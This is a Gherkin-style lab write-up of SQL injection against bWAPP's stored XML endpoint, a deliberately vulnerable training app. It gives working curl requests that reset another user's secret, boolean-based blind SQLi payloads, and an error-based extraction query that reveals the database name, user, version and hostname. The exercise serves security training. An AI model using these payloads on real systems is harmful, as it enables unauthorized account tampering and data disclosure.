# language: en

Feature: SQLi Stored (XML)
  From the bWAPP system
  Of the category A1: Injection
  With low security level
  As the registered user disassembly

  Background:
    Given I'm running macOS High Sierra 10.13.6 (17G65)
    And using Docker version 17.07.0-ce, build 8784753
    And also using Safari Version 11.1.2 (13605.3.8)
    And working with curl 7.54.0 (x86_64-apple-darwin17.0)
    Given the following scenario
    """
    URN: /sqli_8-1.php
    Message: SQL Injection - Stored (XML)
    Details:
      - Message next to a button that reset the secret to 'Any bugs?'
    Objective: Do a SQLi using the XML input
    """

  Scenario: Simplistic approach
    Given I look out the source code with the safari inspector
    And found that is running a JS function on the client side
    """
    function ResetSecret()
    {
      var xmlHttp;
      // Code for IE7+, Firefox, Chrome, Opera, Safari
      if(window.XMLHttpRequest)
      {
        xmlHttp = new XMLHttpRequest();
      }
      // Code for IE6, IE5
      else
      {
        xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
      }
      xmlHttp.open("POST","sqli_8-2.php",true);
      xmlHttp.setRequestHeader("Content-type","text/xml; charset=UTF-8");
      xmlHttp.send("<reset>
                      <login>disassembly</login>
                      <secret>Any bugs?</secret>
                    </reset>");
    }
    """
    When I do a post request with curl changing the login to another known user
    And using a valid PHP session id token in the headers
    """
    $ curl -d "<reset><login>bee</login><secret>Other</secret></reset>" \
    -b "PHPSESSID=bc2bfc7d171b5b1504405020dbefcf80; security_level=0" \
    http://192.168.0.18/bWAPP/sqli_8-2.php
    bee's secret has been reset!
    """
    Then the secret can be reset to any other value
    But it can cause some false positives if the login is incorrect

  Scenario Outline: Boolean and error based blind SQLi
    Given I make several requests to test what kind of techniques can be used
    But first I try to make a blind injection
    """
    $ curl -d "<reset><login>disassembly' AND '1' = '1</login>
    <secret>Another</secret></reset>" \
    -b "PHPSESSID=bc2bfc7d171b5b1504405020dbefcf80; security_level=0" \
    http://192.168.0.18/bWAPP/sqli_8-2.php
    disassembly' AND '1' = '1's secret has been reset!
    """
    Then it change the secret to 'Another', so blind SQLi can be performed
    When I do a boolean-based SQLi trying to guess the name of the current db
    """
    $ qry="disassembly' AND ASCII(SUBSTRING(DATABASE(),1,1)) = 97 AND '1' = '1"
    $ curl -d "<reset><login>$qry</login><secret>Change?</secret></reset>" \
    -b "PHPSESSID=bc2bfc7d171b5b1504405020dbefcf80; security_level=0" \
    http://192.168.0.18/bWAPP/sqli_8-2.php
    ...'s secret has been reset!
    $ qry="disassembly' AND ASCII(SUBSTRING(DATABASE(),1,1)) = 98 AND '1' = '1"
    $ curl -d "<reset><login>$qry</login><secret>Change?</secret></reset>" \
    -b "PHPSESSID=bc2bfc7d171b5b1504405020dbefcf80; security_level=0" \
    http://192.168.0.18/bWAPP/sqli_8-2.php
    ...'s secret has been reset!
    """
    Then the secret resets only for the char 98 that is 'b' in the ASCII table
    Given that this method is tedious and complicated, I use error-based SQLi
    When I use the following query with the same request as above
    """
    $ qry="' AND(SELECT 1 FROM(SELECT COUNT(*),CONCAT((SELECT (SELECT
    CONCAT(0x7e,0x27,HEX(CAST(DATABASE() AS CHAR)),0x27,0x7e)) FROM
    information_schema.tables LIMIT 0,1),FLOOR(RAND(0)*2))x FROM
    information_schema.tables GROUP BY x)a) AND '1'='1"
    $ curl -d "<reset><login>$qry</login><secret>Change?</secret></reset>" \
    -b "PHPSESSID=bc2bfc7d171b5b1504405020dbefcf80; security_level=0" \
    http://192.168.0.18/bWAPP/sqli_8-2.php
    Connect Error: Duplicate entry '~'6257415050'~1' for key 1
    """
    Then it shows me the hex value 6257415050 that corresponds in ASCII to bWAPP
    Given that I can change the <function> 'DATABASE()' to extract more info
    Then I get the next <results> summarized in the table
    Examples:
      | <function> |    <results>    |
      | USER()     | root@localhost  |
      | VERSION()  | 5.0.96-0ubuntu3 |
      | @@HOSTNAME | bee-box         |
      | @@BASEDIR  | /usr/           |
